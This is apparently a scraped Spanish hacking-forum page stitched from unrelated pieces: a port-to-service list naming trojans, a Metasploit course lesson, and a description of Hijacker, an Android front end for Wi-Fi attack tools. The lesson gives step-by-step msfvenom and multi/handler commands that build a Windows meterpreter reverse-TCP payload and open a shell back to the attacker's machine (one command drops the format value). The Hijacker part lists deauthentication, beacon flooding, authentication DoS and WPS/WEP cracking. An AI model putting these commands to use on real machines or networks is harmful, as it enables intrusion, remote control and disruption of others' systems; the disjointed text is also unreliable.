88   Agente de autenticación Kerberos
103   X.400 Standard
107   Remote Telnet Service
108   SNA Gateway Access Server
109   POP2
110   POP3
115   Simple File Transfer Protocol (SFTP)
118   SQL Services
119   Newsgroup (NNTP)
123   NTP
137   NetBIOS Name Service
138   NetBIOS Datagram Service
139   NetBIOS Session Service
143   Internet Message Access Protocol (IMAP)
156   SQL Server
161   SNMP
162   SNMP-trap
177   XDMCP (Protocolo de gestión de displays en X11)
179   Border Gateway Protocol (BGP)
190   Gateway Access Control Protocol (GACP)
194   Internet Relay Chat (IRC)
197   Directory Location Service (DLS)
209   Quick Mail Protocol
217   dBASE Unix
389   Lightweight Directory Access Protocol (LDAP)
396   Novell Netware over IP
443   HTTPS
444   Simple Network Paging Protocol (SNPP)
445   Microsoft-DS (Active Directory, compartición en Windows, gusano Sasser, Agobot)
458   Apple QuickTime
500   IPSec ISAKMP, Autoridad de Seguridad Local
512   exec
513   login
514   syslog usado para logs del sistema
515   Printer
520   RIP
522   Netmeeting
531   Conference
546   DHCP Client
547   DHCP Server
563   SNEWS
569   MSN
631   CUPS: sistema de impresión de Unix
666   identificación de Doom para jugar sobre TCP
992   Telnet SSL
993   IMAP4 SSL
995   POP3 SSL
1080   Socks Proxy
1352   IBM Lotus Notes/Domino RCP
1433   Microsoft-SQL-Server
1434   Microsoft-SQL-Monitor
1494   Citrix MetaFrame Cliente ICA
1512   WINS
1521   Oracle listener
1701   Enrutamiento y Acceso Remoto para VPN con L2TP
1723   Enrutamiento y Acceso Remoto para VPN con PPTP
1761   Novell Zenworks Remote Control utility
1863   MSN Messenger
2049   NFS
2082   CPanel
2086   WHM (Web Host Manager)
2427   Cisco MGCP
3000   Calista IP phone (saliente)
3030   NetPanzer
3128   Squid Proxy
3306   MySQL
3389   Microsoft Terminal Server
3396   Novell agente de impresión NDPS
3690   SubVersion
4099   AIM Talk
4662   eMule
4672   eMule
4899   RAdmin
5000   UPNP (Universal plug-and-play)
5060   SIP (Session Initiation Protocol)
5190   Calista IP phone (entrante)
5222   XMPP/Jabber: conexión de cliente
5223   XMPP/Jabber: puerto por defecto para conexiones de cliente SSL
5269   XMPP/Jabber: conexión de servidor
5432   PostgreSQL
5500   VNC (Virtual Network Computing)
5517   Setiqueue proyecto SETI@Home
5631   pcAnyWhere (host)
5632   pcAnyWhere (host)
5400   VNC (Virtual Network Computing)
5500   VNC (Virtual Network Computing)
5600   VNC (Virtual Network Computing)
5700   VNC (Virtual Network Computing)
5800   VNC (Virtual Network Computing)
5900   VNC (Virtual Network Computing)
6000   X11 usado para X-windows
6112   Blizzard Entertainment
6129   Dameware: Software conexión remota
6346   Gnutella
6347   Gnutella
6348   Gnutella
6349   Gnutella
6350   Gnutella
6355   Gnutella
6667   IRC
6881   BitTorrent: puerto por defecto
6891-6900   MSN Messenger (archivos)
6901   MSN Messenger (voz)
6969   BitTorrent: puerto de tracker
7100   Servidor de Fuentes X11
8000   Shoutcast
8080   HTTP alternativo al puerto 80. También Tomcat default
8118   privoxy
8291   routers Microtik
9009   Pichat peer-to-peer chat server
9898   Dabber (troyano)
10000   Webmin (Administración remota web)
12345   Netbus (troyano)
19226   Puerto de comunicaciones de Panda Agent
20000-20019   ICQ
28800-29000   MSN Game Zone
31337   Back Orifice (troyanos)

---

Ahora vamos a la práctica. en una red LAN.

Maquina atacante:

• OS: Kali Linux
• IP: 192.168.0.103

Maquina Victima:

• OS: Windows 7 - 64 Bits
• IP: 192.168.0.101
• No tiene Anti-Virus "Con fines de hacer prueba"
• Firewall deshabitado "Con fines de hacer prueba"

Ahora vamos a crear el payload, como es contra una maquina Windows tenemos que crear una payload con una extensión exe, entonces escribimos en la consola lo siguiente.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Un puerto cualquiera> -f -o /root/paylodad.exe

en mi caso quedaría así

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f -o /root/payload.exe

al generar el payload se va a demorar un poco a sí que paciencia. cuando finalice podemos ver cuánto pesa el payload.


Opciones al momento de generar nuestro payload. Mas que nada un repaso.

-p | --payload: Se debe especificar el payload que se quiere utilizar, Para ver todos los payload que podemos crear escribimos en la consola msfvenom -l all



LHOST: Nuestra IP.

LPORT: El puerto que queremos que se conecte.

-f: es la extensión o formato en mi caso sería exe.

-o: Esta permite crear un archivo de salida más con el nosotros que deseamos crear nuestro payload.

Ahora una vez creado el paylodad tenemos que pasarlo a la maquina víctima. no ejecuten el payload todavía.

primero tenemos que ejecutar nuestro metasploit para ejecutar el módulo Handlers que nos permite es estar en modo escucha y listo a la espera cuando la maquina victima ejecute el payload.

Escribimos en la consola

msfconsole

y nos dirigimos al módulo Handlers

use exploit/multi/handler

Escribimos

show options

Para ver las opciones del módulo.



En la imagen de abajo no se ve muy clara entonces escriban "info" sin las comillas dentro del módulo.



Ahora tenemos que setear el modulo.

set PAYLOAD <Nombre del payload que creamos en msfvenom>

set LHOST <Nuestra IP>

set LPORT <El puerto que seteamos>

En mi caso quedara algo a así.

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.0.103

set LPORT 4444

Escribimos

show opciones

Para ver nuestra si está todo bien seteados



acá tiene dos opciones ejecutar el payload primero el exe o ejecución handler por mi parte voy a ejecutar el payload primero.





Ahora ejecutamos el handler. con el comando:

exploit

Como pueden ver en la imagen conseguimos la shell y que nos abrió una sesión 1. y listo a si de simple.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Curso Metasploit - Part. 5.1 – Creando un paylodad basico

---

Hijacker es una interfaz gráfica de usuario para las herramientas de prueba de penetración Aircrack-ng, Airodump-ng, MDK3 y Reaver. Ofrece una interfaz de usuario simple y fácil para usar estas herramientas sin escribir comandos en una consola y copiar y pegar direcciones MAC.
Esta aplicación requiere un dispositivo Android ARM con un adaptador inalámbrico interno que admita el modo de monitor. Algunos dispositivos Android lo hacen, pero ninguno de ellos de forma nativa. Esto significa que necesitará un firmware personalizado. Cualquier dispositivo que use el conjunto de chips BCM4339 (MSM8974, como Nexus 5, Xperia Z1 / Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) funcionará con Nexmon (que también es compatible con algunos otros conjuntos de chips). Los dispositivos que usan BCM4330 pueden usar bcmon.
Una alternativa sería usar un adaptador externo que admita el modo de monitor en Android con un cable OTG.
Las herramientas necesarias están incluidas para los dispositivos armv7l y aarch64 a partir de la versión 1.1. El controlador Nexmon y la utilidad de administración para BCM4339 y BCM4358 también están incluidos.
El acceso raíz también es necesario, ya que estas herramientas necesitan una raíz para funcionar.

---

Caracteristicas

Recopilación de información

• Vea una lista de puntos de acceso y estaciones (clientes) a su alrededor (incluso los ocultos)
• Ver la actividad de una red específica (midiendo beacons y paquetes de dato[/pre]s) y sus clientes
• Estadísticas sobre puntos de acceso y estaciones
• Consulte al fabricante de un dispositivo (AP o estación) desde la base de datos OUI
• Vea la potencia de señal de los dispositivos y filtre los que están más cerca de usted
• Guarde los paquetes capturados en el archivo .cap

Ataques

• Desaauthenticar a todos los clientes de una red (ya sea para cada uno de ellos (efectivo) o sin un objetivo específico)
• Desaauthenticar a un cliente específico de la red a la que está conectado
• MDK3 Beacon Flooding con opciones personalizadas y lista SSID
• DoS de Autenticación MDK3 para una red específica o para cada AP cercano
• Capture un apretón de manos WPA o junte IV para romper una red WEP
• Reaver WPS cracking (ataque de pixie-dust usando NetHunter chroot y adaptador externo)

Otro

• Deja la aplicación ejecutándose en segundo plano, opcionalmente con una notificación
• Copie comandos o direcciones MAC al portapapeles
• Incluye las herramientas necesarias, sin necesidad de instalación manual
• Incluye el controlador Nexmon, biblioteca requerida y utilidad de administración para dispositivos BCM4339 y BCM4358
• Establecer comandos para habilitar y deshabilitar el modo de monitor automáticamente
• Agrietar archivos .cap con una lista de palabras personalizada
• Cree acciones personalizadas y ejecútelas fácilmente en un punto de acceso o cliente
• Ordenar y filtrar puntos de acceso y estaciones con muchos parámetros
• Exportar toda la información recopilada a un archivo
• Agregue un alias persistente a un dispositivo (por MAC) para una identificación más fácil

---

Capturas de pantalla

---

Instalación

Asegurarse:

• Estar en Android 5+
• está rooteado (se requiere SuperSU, si está en CM / LineageOS instale SuperSU)
• usted tiene un firmware para admitir el modo monitor en su interfaz inalámbrica

---